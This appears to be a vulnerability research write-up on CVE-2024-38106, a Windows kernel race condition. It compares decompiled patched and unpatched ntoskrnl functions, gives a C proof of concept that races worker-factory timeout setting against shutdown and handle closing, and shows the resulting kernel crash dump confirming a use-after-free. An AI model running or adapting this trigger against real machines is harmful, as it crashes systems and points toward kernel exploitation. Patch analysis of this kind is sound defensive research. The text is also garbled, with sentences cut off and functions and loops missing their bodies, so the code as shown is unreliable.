In the security patches for August, Microsoft fixed several ntoskrnl.exe
bugs, and one of them (CVE-2024-38106) being exploited in the wild. As anything ITW always require closer attention, we attempt to create a POC for it by.
Windows versions used during patch analysis: Windows 11, July 25 vs August 14.
This post is not meant to be a deep-dive root cause analysis, but hopefully will still be interesting.
Below are the results:
After quickly filtering off non-security changes, we identified two functions of interest; VslGetSetSecureContext()
and NtSetInformationWorkerFactory()
__int64 __fastcall VslGetSetSecureContext(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
memset(v11, 0, 0x68ui64);
v11[1] = a2;
v11[2] = a3;
v11[3] = a4;
LOWORD(v8) = (a1 != 0) + 14;
LOBYTE(v9) = 2;
return VslpEnterIumSecureMode(v9, v8, 0i64, v11);
__int64 __fastcall VslGetSetSecureContext(__int64 a1, int a2, int a3)
memset(v11, 0, 0x68ui64);
memset(v10, 0, 0x48ui64);
v6 = 15;
if ( !a1 )
v6 = 14;
WORD1(v11[0]) = v6;
result = VslpLockPagesForTransfer((unsigned int)v10, a2, a3, a1 != 0, 0);
if ( (int)result >= 0 )
v11[1] = v10[0];
LOBYTE(v8) = 2;
v11[2] = v10[7];
v9 = VslpEnterIumSecureMode(v8, WORD1(v11[0]), 0i64, v11);
return v9;
return result;
This patch fixes a race condition by implementing proper locking for the VslpEnterIumSecureMode()
operation which is supposed to be related to the VBS secure kernel.
The code changes here are a bit more complicated. Security-related part looks as follows:
if ( v69[3] >= 0i64 )
goto LABEL_155;
if ( v69[3] > (__int64)0xFFFFFFFFFF676980ui64 )
v69[3] = 0xFFFFFFFFFF676980ui64;
if ( v69[3] < (__int64)0xFFFFFFFE9A5F4400ui64 )
v69[3] = 0xFFFFFFFE9A5F4400ui64;
v40 = v69[3];
*((_QWORD *)v15 + 14) = v69[3];
v69[1] = -1i64;
KeSetTimer2(v15 + 424, v40, -v40, v69);
goto LABEL_89;
case 2: // enum WORKERFACTORYINFOCLASS: WorkerFactoryIdleTimeout
if ( (unsigned int)Feature_1697191224__private_IsEnabledDeviceUsage()
&& *(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )
Thread = 0x80;
goto LABEL_41;
v20 = v63[3];
if ( v63[3] >= 0i64 )
Thread = 0xC000000D;
v15 = 0;
if ( v63[3] > -10000000i64 )
v20 = -10000000i64;
if ( v20 < -6000000000i64 )
v20 = -6000000000i64;
v63[3] = v20;
*((_QWORD *)v16 + 14) = v20;
v63[1] = -1i64;
KeSetTimer2((__int64)(v16 + 424), v20, -v20, (__int64)v63);
v15 = 0;
goto LABEL_99;
As you can see, a flag check had been added:
*(_BYTE *)(*((_QWORD *)v16 + 2) + 0x21i64) )
This flag is set during shutdown inside NtShutdownWorkerFactory() –> ExpShutdownWorkerFactory():
Object = 0i64;
v4 = ObReferenceObjectByHandle(a1, 0x20u, ExpWorkerFactoryObjectType, PreviousMode, &Object, 0i64);
if ( v4 >= 0 )
v5 = (struct _EX_RUNDOWN_REF *)Object;
if ( (Object[51] & 0x200) != 0 )
if ( (_QWORD *)Object[74] == Object + 53 && (unsigned __int8)KiDeregisterObjectWaitBlock(Object + 53) )
ObfDereferenceObjectWithTag(Object, 0x746C6644u);
*(_BYTE *)(Object[2] + 33i64) = 1; // shutdown flag set
This means that there is indeed a race condition between the object construction (by NtSetInformationWorkerFactory(.., WorkerFactoryIdleTimeout, ..)
) and destruction (by NtShutdownWorkerFactory()
). The POC is shown below.
#include "nt.h"
#include "stdio.h"
#include "time.h"
#define TEST_RACE_COUNT 0x6000
HANDLE hWorkingFactory;
HANDLE hIoCompletion;
HANDLE hProcess;
DWORD WINAPI th_working_factory_constructor(LPVOID Param)
WORKER_FACTORY_BASIC_INFORMATION worker_info_buf = { 0x0 };
DWORD out_len;
hProcess = GetCurrentProcess();
hIoCompletion = CreateIoCompletionPort(INVALID_HANDLE_VALUE, NULL, 0, 0);
LONG wk;
for (int i = 0; i < 0x800000; i++) {
hWorkingFactory = NULL;
stat = NtCreateWorkerFactory(&hWorkingFactory, GENERIC_ALL, NULL, hIoCompletion, hProcess, NULL, 0, 2, 0, 0);
void race_test_working_factory()
LONGLONG timeouts[] = { -1000000LL, -2000000LL, -3000000LL, -5000000LL, -10000000LL, -20000000LL, -30000000LL };
LONG wk;
for (size_t k = 0; k < 7; k++) {
for (size_t i = 0; i < TEST_RACE_COUNT; i++) {
liDueTime.QuadPart = timeouts[k]; // 0.1-20 seconds
NtSetInformationWorkerFactory(hWorkingFactory, WorkerFactoryIdleTimeout, &liDueTime, sizeof(liDueTime));
void race_test_close() {
while (1) {
void race_test_nls() {
HANDLE hThread_constructor = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)th_working_factory_constructor, 0, 0, NULL);
HANDLE hThread_constructor3 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_working_factory, 0, 0, NULL);
HANDLE hThread_constructor2 = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)race_test_close, 0, 0, NULL);
WaitForSingleObject(hThread_constructor, INFINITE);
int main() {
hProcess = GetCurrentProcess();
Note that trigger requires calling NtClose()
on worker factory object handle to achieve vulnerable state.
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If a kernel debugger is available get the stack backtrace.
Arg1: ffff800520e90f50, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000000, bitfield :
bit 0 : value 0 = read operation, 1 = write operation
bit 3 : value 0 = not an execute operation, 1 = execute operation (only on chips which support this level of status)
Arg4: fffff803250bc750, address which referenced memory
Debugging Details:
Key : WER.OS.Version
Value: 10.0.19041.1
BUGCHECK_P1: ffff800520e90f50
BUGCHECK_P4: fffff803250bc750
READ_ADDRESS: ffff800520e90f50 Special pool
PROCESS_NAME: nt_race_tester.exe
TRAP_FRAME: ffffc38c54653740 -- (.trap 0xffffc38c54653740)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=ffff800520e90f20 rbx=0000000000000000 rcx=000000006a4618d3
rdx=ffff800520e90f20 rsi=0000000000000000 rdi=0000000000000000
rip=fffff803250bc750 rsp=ffffc38c546538d0 rbp=0000000000000001
r8=ffffc38c54653900 r9=0000000000000000 r10=fffff80324e0d000
r11=ffff800523464f20 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei ng nz na pe nc
fffff803250bc750 483b4a30 cmp rcx,qword ptr [rdx+30h] ds:ffff800520e90f50=????????????????
Resetting default scope
ffffc38c54652e48 fffff80325325e12 : ffffc38c54652fb0 fffff8032518c470 0000000000000000 0000000000000000 : nt!DbgBreakPointWithStatus
ffffc38c54652e50 fffff803253253f6 : 0000000000000003 ffffc38c54652fb0 fffff80325222ae0 000000000000000a : nt!KiBugCheckDebugBreak+0x12
ffffc38c54652eb0 fffff8032520abf7 : 0000000000000000 0000000000000001 ffff800512a86f08 ffffc38c546535e0 : nt!KeBugCheck2+0x946
ffffc38c546535c0 fffff8032521f3a9 : 000000000000000a ffff800520e90f50 0000000000000002 0000000000000000 : nt!KeBugCheckEx+0x107
ffffc38c54653600 fffff8032521ad78 : 0000000000000400 ffffc60d744dcec0 0000000000000218 ffff800505d7af20 : nt!KiBugCheckDispatch+0x69
ffffc38c54653740 fffff803250bc750 : 0000000000000000 ffff800512a86f8a 0000000000000000 fffff80325a3ece0 : nt!KiPageFault+0x478
ffffc38c546538d0 fffff803250bc3e2 : ffff800512a86f08 ffff800512a86f01 0000000000000001 0000000000000001 : nt!KiInsertTimer2WithCollectionLockHeld+0xc0
ffffc38c54653920 fffff80325116e5b : 0000000000000000 00001f8000e90000 0000000000000002 0000000000000000 : nt!KeSetTimer2+0x172
ffffc38c54653990 fffff8032521eb05 : 0000000000000000 0000000000000000 0000000000000000 ffff800500000000 : nt!NtSetInformationWorkerFactory+0x62b
ffffc38c54653b00 00007ffd7f0704c4 : 00007ff668ab1304 0000000000000000 0000000000000000 0000000000000000 : nt!KiSystemServiceCopyEnd+0x25
0000000e9d7ffe58 00007ff668ab1304 : 0000000000000000 0000000000000000 0000000000000000 0000000000000000 : ntdll!NtSetInformationWorkerFactory+0x14
0000000e9d7ffe60 0000000000000000 : 0000000000000000 0000000000000000 0000000000000000 0000000000000003 : nt_race_tester+0x1304
SYMBOL_NAME: nt!KiInsertTimer2WithCollectionLockHeld+c0
IMAGE_NAME: ntkrnlmp.exe
As we can see, reaching KiInsertTimer2WithCollectionLockHeld()
worker factory object and associated timer are already freed.
3: kd> dq ffff800520e90f50
ffff800520e90f50 ???????????????? ????????????????
ffff800520e90f60 ???????????????? ????????????????
ffff800520e90f70 ???????????????? ????????????????
ffff800520e90f80 ???????????????? ????????????????
ffff800520e90f90 ???????????????? ????????????????
ffff800520e90fa0 ???????????????? ????????????????
ffff800520e90fb0 ???????????????? ????????????????
ffff800520e90fc0 ???????????????? ????????????????
3: kd> !pool ffff800520e90f50
Pool page ffff800520e90f50 region is Special pool
ffff800520e90000: Unable to get contents of special pool block